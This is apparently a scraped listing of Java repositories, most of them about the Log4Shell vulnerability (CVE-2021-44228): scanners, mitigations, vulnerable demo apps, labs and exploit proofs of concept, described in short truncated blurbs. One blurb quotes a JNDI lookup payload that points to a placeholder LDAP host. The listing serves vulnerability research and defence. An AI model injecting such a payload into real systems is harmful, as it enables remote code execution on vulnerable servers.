25 Repositories
Java log4shell-tester Libraries
Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find Log4J instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too!
Log4-detector Scanner that detects vulnerable Log4J versions to help teams assess their exposure to CVE-2021-44228 (CRITICAL), CVE-2021-45046, CVE-202
log4j2 remote code execution or IP leakage exploit (with examples)
log4j2-exploits This fundamental vulnerability was reported by CVE-2018-3149 and patched by this article. (8u121 Release Notes
Local Bytecode Scanner for the Log4JShell Vulnerability (CVE-2021-44228)
🔍 Log4JShell Bytecode Detector Log4jShell Bytecode Detector is an open source tool that helps identify if a jar file is affected by the critical CVE-
A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)
Log4jPatcher A Java Agent based mitigation for Log4j2 JNDI exploits. This agent employs 2 patches: Disabling all Lookup conversions (on supported Log4
PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs
Log4Shell-Rex The following RegEx was written in an attempt to match indicators of a Log4Shell (CVE-2021-44228 and CVE-2021-45046) exploitation. If yo
A Basic Java Application Vulnerable to the Log4Shell RCE
This is a basic, minimal, intentionally vulnerable Java web application including a version (2.14.1) of the log4j library affected by the infamous log4shell (CVE-2021-44228) vulnerability.
Contains all my research and content produced regarding the log4shell vulnerability
Objective Contains all my research and content produced regarding the log4shell vulnerability. Content Folder "analysis" Contain the information that
Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.
Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nickname
Log4Shell Zero-Day Exploit Proof of Concept
Log4Shell Zero-Day Exploit if an attacker manages to log this string ${jndi:ldap://someaddresshere/param1=value1} to log4j it somehow loads the class/java
An LDAP RCE exploit for CVE-2021-44228 Log4Shell
log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed
Disables JNDI lookup globally using Java agent instrumentation, mitigation for Log4Shell attacks.
NoJNDI This is a simple proof of concept agent that disables JNDI lookups globally across the JVM. This is useful for mitigating the Log4Shell attack,
Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.
CVE-2021-44228 (Log4Shell) Proof of Concept
CVE-2021-44228 (Log4Shell) Proof of Concept Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect ag
Log4Shell sample vulnerable application (CVE-2021-44228)
Java testing framework for testing pojo methods
Java testing framework for testing pojo methods. It tests equals, hashCode, toString, getters, setters, constructors and whatever you report in issues ;)
Logout4Shell - Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell
Logout4Shell Description A vulnerability impacting Apache Log4j versions 2.0 through 2.14.1 was disclosed on the project’s Github on December 9, 2021.
Huntress Log4Shell Testing Application
Huntress Log4Shell Testing Application This repo holds the source for the HTTP and LDAP servers hosted here. Both services are hosted under one Java a
Log4shell-hunter - Scanner that scans local files for log4shell vulnerability
Log4shell-hunter - Scanner that scans local files for log4shell vulnerability. Does bytecode analysis so it does not rely on metadata. Will find vulnerable log4j even if it has been self-compiled/repackaged/shaded/nested (e.g. uberjar, fatjar) and even obfuscated.
Test case to check if the Log4Shell/CVE-2021-44228 hotfix will raise any unexpected exceptions
Log4Shell Hotfix Side Effect Test Case I wanted to know if any ClassNotFoundException or similar unexpected exception is raised when one applies the C
Log4shell docker lab using christophetd's vulnerable app and mbechler's marshalsec
log4shell-dockerlab Credits All credit goes to the original authors. I just git-cloned and created a docker-compose file, that's all. LunaSec - log4s
Log4J CVE-2021-44228 Minecraft PoC
CVE-2021-44228 in Minecraft Java 16 Paper server build #397 Minecraft 1.17.1 Exploitation In Java 16 only deserialization attacks work by default usin
Small example repo for looking into log4j CVE-2021-44228
log4j CVE-2021-44228 Lame useless repo to look into log4j CVE-2021-44228. Setup The repository contains a .idea/ folder which is a IntelliJ IDEA proje
log4j2 Log4Shell CVE-2021-44228 proof of concept
Log4Shell CVE-2021-44228 proof of concept Requirement Java (JDK/JRE) 8 or later version curl exploitable Simple spring boot application that serves a
A simple project using Serenity BDD, developed for backend testing.
🚧 UNDER CONSTRUCTION 🚧 A little about Serenity and the project developed Serenity_BDD is an open-source library that aims to make the idea of documen